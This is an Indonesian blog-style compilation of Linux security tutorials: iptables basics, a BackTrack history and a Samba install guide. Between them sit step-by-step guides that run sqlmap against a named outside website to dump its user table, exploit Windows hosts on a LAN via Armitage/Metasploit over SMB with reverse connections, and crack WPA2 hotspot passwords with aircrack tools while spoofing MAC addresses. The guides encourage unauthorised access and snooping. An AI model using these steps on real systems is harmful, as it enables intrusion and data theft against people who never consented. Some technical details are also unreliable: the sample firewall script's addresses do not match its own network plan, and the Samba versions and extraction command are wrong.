Tools IPTables

IPTABLES

– Apa itu iptables?

iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita.

– Gimana perintahnya?

iptables [–t tables] [option] [rule] [target]

Contohnya:

iptables –P FORWARD ACCEPT

– Apa saja yang bisa dilakukan dengan iptables?

Dengan kemampuan tools iptables ini, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.

Perlakuan apa saja yang dialami data oleh iptables?

Perlakuan yang dialami oleh data/paket data oleh iptables digambarkan melalui tabel. Macam tabelnya adalah:
1. Filter : tabel default yang ada dalam penggunaan iptables
2. NAT : tabel ini digunakan untuk fungsi NAT, redirect, redirect port
3. Mangle : tabel ini berfungsi sebagai penghalus proses pengaturan paket

Bagaimana kita bisa peroleh informasi tentang iptables tersebut di dalam sistem operasi linux?

Kita bisa peroleh info tentang iptables, dengan cara mengetikkan:

man iptables
atau
iptables –help

Perintah man adalah untuk mendapatkan manual penggunaaan dari iptables ini. Sedangkan help adalah untuk mendapatkan informasi help dari iptables tersebut.

– OPTION
Option terdiri dari command, dan parameter serta opsi tambahan

COMMAND
Command dan rule yang dipasang pada iptables (firewall) memiliki ketentuan. Pada dasarnya iptables pada komputer dianggap sebagai TABEL IP sesuai dengan namanya. System hanya akan menjalan rule yang ada pada tabel. Sedangkan rule yang sudah ada pada iptables juga dapat di hapus atau di replace dengan rule lain. Berikut beberapa command untuk penambahan, penghapusan dan operasi sejenisnya yang akan diperlakukan terhadap rule.

Daftar  Perintah berikut keterangan

-A atau –append Melakukan penambahan rule
-D atau –delete Melakukan penghapusan rule
-R atau –replace Melakukan replacing rule
-L atau –list Menampilkan ke display, daftar iptables
-F atau –flush Menghapus daftar iptables/pengosongan
-I atau –insert Melakukan penyisipan rule
-N atau –new-chain Melakukan penambahan chain baru
-X atau –delete-chain Melakukan penghapusan chain
-P atau –policy Memberikan rule standard
-E atau –rename Memberikan penggantian nama
-h atau –help Menampilkan fasilitas help

Table 1. Table Command iptables

 

 

Parameter
Parameter iptables digunakan sebagai pelengkap yang diperlukan untuk tujuan spesifikasi rule tersebut

Parameter berikut Keterangan
-p, –protocol (proto) Parameter ini untuk menentukan perlakuan terhadap protokol
-s, –source (address) –-src Parameter untuk menentukan asal paket
-d, –destination (address) –-dst Parameter untuk menentukan tujuan paket
-j, –jump (target)
-g, –goto (chain)
-i, –in-interface Masuk melalui interface (eth0, eth1 dst)
-o, –out-interface
[!] -f, –fragment
-c, –set-counters

Table 2. Tabel Parameter iptables

 

 

 

Parameter berikut Keterangan
–sport
–source-port Menentukan port asal
–dport
–destination-port Menentukan port tujuan
–tcp-flags Menentukan perlakuan datagram
–syn
Table 3. Tabel Parameter detail

Selanjutnya apa itu yang disebut dengan chain?
Chain/rantai digambarkan sebagai jalur aliran data. Chains yang diperlukan untuk iptables ini antara lain:

Chain berikut Keterangan
FORWARD Route packet akan di FORWARD tanpa di proses lanjut di local
INPUT Route packet masuk ke dalam proses lokal sistem
OUTPUT Route packet keluar dari local sistem
PREROUTING Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT
POSTROUTING Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT

Tabel 4. Tabel Chain

 

 

 

 

Chain PREROUTING dan POSTROUTING dimaksudkan sebagai jalur data sebelum dan sesudah data tersebut masuk ke dalam route.
PREROUTING: data sebelum masuk jalur route, akan di kenakan rule
POSTROUTING: data sebelum masuk akan dikenakan route

Apakah target itu?
Target adalah tujuan perlakuan terhadap rule. Pada target ini terletak keputusan, paket data mau diapakan, apakah mau di tolak, atau diteruskan atau diolah terlebih dahulu. Berikut daftar table target iptables

Target berikut Keterangan
ACCEPT Rantai paket tersebut diterima dalam rule
DROP Rantai paket tersebut “dijatuhkan”
REJECT Rantai paket tersebut ditolak seperti DROP
DNAT Rantai paket di “destination nat” kan ke address lain
SNAT Rantai paket di arahkan ke source nat tertentu
REDIRECT Rantai paket di redirect ke suatu addres dan port tertentu
MASQUERADE Bekerja seperti SNAT tapi tidak memerlukan source
REJECT Bekerja seperti DROP

Contoh beberapa kasus untuk iptables

Misalkan terdapat sebuah jaringan komputer menggunakan koneksi internet dengan IP ADDRESS publik
222.124.132.91 (eth0)
Server gateway memiliki 3 anak jaringan (jaringan lokal) dengan dibedakan subnet

192.168.0.0/24 (eth1)
192.168.1.0/24 (eth2)
192.168.10.0/24 (eth3)

Kondisi dalam jaringan, eth3 tidak diperbolehkan melakukan akses ke internet tetapi diperbolehkan masuk ke jaringan lokal lainnya melalui protokol http. Sedangkan eth1 dan eth2 diperbolehkan melakukan akses ke internet. Pada IP ADDRESS 192.168.1.10 terdapat webserver, dan pada IP Address 192.168.1.12 terdapat koleksi intranet yang akan dipublish ke internet. Disamping itu, koneksi internet 1 mega tersebut akan di share, untuk semua komputer di eth2 akan dibatasi pemakaiannya maksimal 10kbps. Berikut contoh sederhana routin firewallnya

#/bin/bash

#blok semua address (default), pada dasarnya semua akses di blok
iptables –P INPUT –j DROP
#bersihkan table
iptables –F
iptables –t nat –F
iptables –t mangle -F
#perkecualian dengan syarat tertentu
iptables -A INPUT -d 192.168.1.0/24 -m limit –limit 10/s –limit-burst 20 -j ACCEPT
iptables -A INPUT -s 192.168.1.0/24 -m limit –limit 10/s –limit-burst 20 -j ACCEPT
iptables –t nat –A POSTROUTING –s 192.168.0.0/24 –j MASQUERADE
iptables –t nat –A POSTROUTING –s 192.168.1.0/24 –j MASQUERADE
#forward webserver dan intranet
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j DNAT –to 192.168.0.10:80
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 88 -j DNAT –to 192.168.0.12:80
#redirect ke squid
iptables –t nat –A PREROUTING –s 192.168.10.0/24 -p tcp –dport 80 -j REDIRECT –to-port 3128
iptables –t nat –A PREROUTING –s 192.168.10.1/24 -p tcp –dport 80 -j REDIRECT –to-port 3128
==============================================================================

Menggunakan tools sqlmap

Tools sql Map digunakan untuk mengeksploitasi web yang mempunyai kelemahan pada error sql, biasanya url yang mempunyai lubang keamanan jika ditambahkan karakter string akan menghasilkan pesan error, ini memungkinkan bisa diexploitasi.

1.buka sqlmap.

Application – Backtrack – Exploitation – Web Exploitation Tools – SqlMAP

2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 –dbs

-u       = url
–dbs  = kita mencari nama databasenya…

3. Setelah ketemu nama databasenya yaitu=”uselessj_uj2006″
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 –tables

-D            = nama database yang sudah kita temukan tadi
–tables     = untuk mencari nama table..

4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut…:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users –columns 

 

 

lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users –dump

fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)

Menggunakan tools MsfGui.

Menggunakan tools MsfGui, untuk hacking komputer di jaringan lokal.

Langkah – langkah yang harus dilakukan adalah sebagai berikut :

1. Pastikan komputer terhubung ke internet. ( korban saya kali ini Windows XP SP 3 )
2. Untuk Linux buka terminal dan ketik ” msfgui ” ( tanpa tanda petik ), untuk windows langsung saja buka ” msfgui “, pilih ” start new msfrpcd ” tampilannya akan seperti ini.

 
3. Tunggu hingga msfrpcd memunculkan payloadnya.
4. Pilih File >> Show connection details

 

5. Copykan password yang terlihat ke notepad / gedit.

 

6. Pilih File >> Exit, Lalu pilih “no”.
         
7. Kembali ke terminal dan ketik ” Armitage “, akan muncul seperti ini. Pilih connect, jangan lupa hilangkan centang pada SSL. Untuk tab user tidak perlu dirubah, masukkan password yang telah didapatkan tadi ke tab password. Jika bermasalah dengan DB string klik saja tombol tanda “?” lalu pilih set.

 

 
 8. Tunggu hingga Armitage muncul seperti ini :
         
9.Selanjutnya mencari target, pilih Host >> Nmap Scan >> Quick Scan
 
10. Masukan range dari IP Address yang ingin disusupi, tunggu hingga selesai.
      Contoh : 192.168.0.1/24
 
11. Akhirnya target didapatkan
 
12. Sekarang temukan serangan exploit melalui port ( bisa juga melalui vunerability ), tunggu hingga selesai.
 
13. Klik pada Host yang ingin disusupi, disini kita akan menyusupi windows lancarkan serangan melalui SMB
  
 
14. Gunakan reverse connection 
 
15. Bingo..!!!
 
16. Contoh serangan yang saya lakukan dengan browse files
 
17. Happy Hunting..!!!

Menggunakan tools msfconsole exploit

Mungkin setelah tersambung ke jaringan wireless selain berinternetan gratis kita bingung mau apa lagi, berikut remote komputer yang berada di jaringan LAN dengan kabel atau wireless, berikut cara penggunaan toolsnya step by step.

  • Ini hanya tutorial untuk memenuhi tugas kuliah, penulis tidak bertanggung jawab dan berharap tidak dilakukan untuk hal yang tidak tidak.
  1. Pertama kita memanggil tools exploit dengan sintax msfconsole :

2.) Setelah tools mungcul, selanjutnya kita menset tools ini ke directory seperti dalam pic dibawah ini :

3.) Setelah merubah directory seperti diatas langkah selanjutnya adalah menset ip mana yang akan kita jadikan host dengan sintax “lhost” dan IP target yang akan kita remote atau kita hinggapi dengan sintax “rhost” kemudian mengetikkan Ipnya, berikut picnya :

4.) Yups, setelah kita menset target dengan IP dan beberapa konfigurasi, berikut hasil yang akan kita dapat, tentunya keamanan target juga mempengaruhi apakan ini berhasil atau tidak..😀

Menggunakan tools airmon

Salah satu tools yang saya gunakan dalam sistem operasi backtrack adalah tools airmon, selain banyak tools yang terdapat untuk analisis jaringan, juga tidak sedikit tools tools yang digunakan untuk mengeksploitasi jaringan, Seperti LAN, dan bahkan teknologi jaringan yang sekarang sedang trend yaitu wireless, Kita dapat menyusup kedalam jaringan wireless yang menggunakan enkripsi WPA2 pada akses pointnya, kali ini dengan menggunakan tools airmon, dengan Step by step seperti berikut :

  1. Mengaktifkan airmon :

  1. dengan mengetikkan perintah diatas, akan memberikan informasi interface perangkat apa yang terdapat di laptop kita :

  1. selanjutnya kita akan membuat interface wireless virtual dengan nama mon0, ini akan kita digunakan untuk menyusup ke jaringan wireless target, dengan setelah ini kita akan merubah alamat mac address untuk melindungi diri…😀
  1. Sebelum kita mengganti mac address, yang dilakukan adalah mematikan dulu interface wireless kita dengan sintax “ifconfig mon0 down”, dan menyalakan kembali dengan “ifconfig mon0 up”.
  1. Setelah kita merubah mac address selanjutnya adalah menscan essid dari AP, mac address, chanel, serta enkripsi yang digunakannya, ini akan memakan waktu cukup lama, sekitar 45 menit

 6.) Stelah kita mendapatkan data2 tentang target selanjutnya adalah melancarkan serangan membobol password hotspotnya..😀 Sintaxnya seperti berikut :

7.) Tunggu beberapa saat, terminal ini akan menunjukan password yang digunakan, setelah kita terkoneksi ke jaringan, terserah kalian mau apa, mau meremote komputer atau cuman ngintip data.. hahaa, selanjutnya saya akan mencoba menggunakan tools angry IP untuk menscan IP address yang komputer komputer client yang terhubung ke jaringan wireless tadi..😀

Nenek moyang Distro Backtrack

BackTrack adalah salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection. Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support hardware. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan saint dan maltego sedangkan nessus tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan kernel linux terbaru yaitu kernel 2.6.30.4. Sekaligus pada Rilis BackTrack 4, dapat dikatakan berpindah basis yakni dari dahulu yang Slackware menjadi berbasis Ubuntu. Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan wireless injection (wireless injection attacks).

Sejarah Backtrack

Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan sekuriti dari Israel. Jadi merupakan kolaborasi komunitas. Backtrack sendiri merupakan merger dari whax yang merupakan salah satu distro Linux yang digunakan untuk tes keamanan yang asal dari whax sendiri dariKnoppix. Ketika Knoppix mencapi versi 3.0 maka dinamakan dengan whax. Whax dapat digunakan untuk melakukan tes sekuriti dari berbagai jaringan di mana saja. Max Mosser merupakan auditor security collection yang mengkhususkan dirinya untuk melakukan penetrasi keamanan di Linux. Gabungan dari auditor dan Whax ini sendiri menghasilkan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.

Namun, sejak rilis ke-4 hingga rilis yang terbaru ini, BackTrack sudah tidak lagi menggunakan basis Knoppix. BackTrack kini menggunakan basis Ubuntu.

BackTrack telah memasuki versi 5 R3 dengan kernel 3.2.6

 

Tools-Tools Yang terdapat dalam Backtrack

BackTrack menyediakan akses mudah untuk tools komprehensif yang berhubungan dengan keamanan, mulai dari Port Scanner sampai Password Scanner. Dukungan fungsi Live CD dan Live USB mengijinkan pengguna untuk me-boot BackTrack secara langsung dari media penyimpan portabel tanpa harus melakukan penginstallan pada Hardisk secara permanen.

BackTrack berisi banyak tools keamanan yang terkenal yaitu:

  • Metasploit integration (Non-Working  and Officially Unsupported)
  • RFMON Injection capable wireless drivers
  • Aircrack-NG
  • Kismet
  • Nmap
  • Ophcrack
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeEF (Browser Exploitation Framework)
  • Hydra
  • OWASP Mantra Security Framework collection of hacking tools, add-ons and scripts based on Firefox
  • Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
  • Quypt (Terminal Emulator) (software pribadi oleh Crimson Hacking group, yang telah dimasukan ke bagian utama) Blackhat
  • Banyak kumpulan exploits serta software yang lebih umum seperti browsers.

BackTrack membagi tools menjadi 12 kategori:

  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous

Source : http://id.wikipedia.org/wiki/BackTrack

Instalasi Samba dari kode sumber.

Untuk Slackware, Binary Samba Versi 2.6 secara default sudah diinstal pada saat instalasi awal. Untuk mengecek apakah Slackware Anda sudah ada Samba atau belum, bisa dilakukan dengan cara :

$ whereis smbd

$ whereis nmbd

Atau cek file rc yang menginisialisasi Samba (rc.samba) pada saat booting :

$ cd /etc/rc.d

etc/rc.d $ ls -l

Jika tidak ditemukan, Anda dapat menginstall lewat CD dengan pkgtool. Beberapa catatan tentang Binary Samba yang disertakan dalam distribusi Slackware, akan dibahas pada akhir bagian intstalasi. Untuk instalasi secara umum, dapat dilakukan dengan cara sebagai berikut :

  1. Download Distribusi SambaDaftar server yang menyediakan distribusi Samba dapat dilihat di ftp.samba.org atau
    http://www.samba.org. Mirror server tersedia hampir  seluruh dunia dan Anda dapat memilih yang terdekat. File yang harus didownload adalah :

    samba-versi-terakhir.tar.gz

    Saat buku ini ditulis versi terakhir dari Samba adalah 2.0.7 (samba-2.7.0.tar.gz).

  2. Ekstraksi fileFile yang Anda download masih berupa tar ball yang dikompress. Untuk mengekstraknya, Anda dapat jalankan langkah :

    $ mkdir /usr/local/src

    $ cp samba*.tar.gz /usr/local/src

    $ gzip samba*.tar.gz | tar xvf –

    Catatan :

    Pengguna Linux pada umumnya menggunakan direktori /usr/local untuk menyimpan semua pogram baru. Direktori ini biasanya mempunyai struktur direktori root seperti /usr/local/bin,/usr/local/etc, /usr/local/docs. Dalam lingkungan jaringan, direktori ini biasanya diset untuk dapat ditulis oleh beberapa user dan dieksekusi oleh semua user.

  3. Baca DokumentasiSebelum memulai instalasi, biasakan untuk membaca dokumentasi terlebih dahulu. Setelah Anda ekstrak Samba, dokumentasi dapat dilihat di direktori utama Samba. Beberapa file yang perlu dibaca :

    README

    WHATSNEW.txt

    Docs/textdocs/UNIX_INSTALL.txt

  4. Konfigurasi SambaSebagaimana proses standar dalam instalasi aplikasi berbentuk source di Linux, mulai dengan configure. Jalankan semua proses instalasi sebagai root, atau Anda akan terima pesan :

    Configure: warning: running as non-root will disable some test

    Menjalankan proses instalasi dengan user root akan lebih memastikan aplikasi Samba terinstal dengan baik.

    /usr/local/src$ su –

    password :

    /usr/local/src # cd samba-2.0.7 (direktori utama hasil ekstraksi)

    /usr/local/src/samba-2.0.7# ./configure

    /usr/local/src/samba-2.0.7# make

    /usr/local/src/samba-2.0.7# make install

    Selesai proses instalasi, Samba akan menyimpan filenya dalam beberapa direktori di dalam direktori utama /usr/local/samba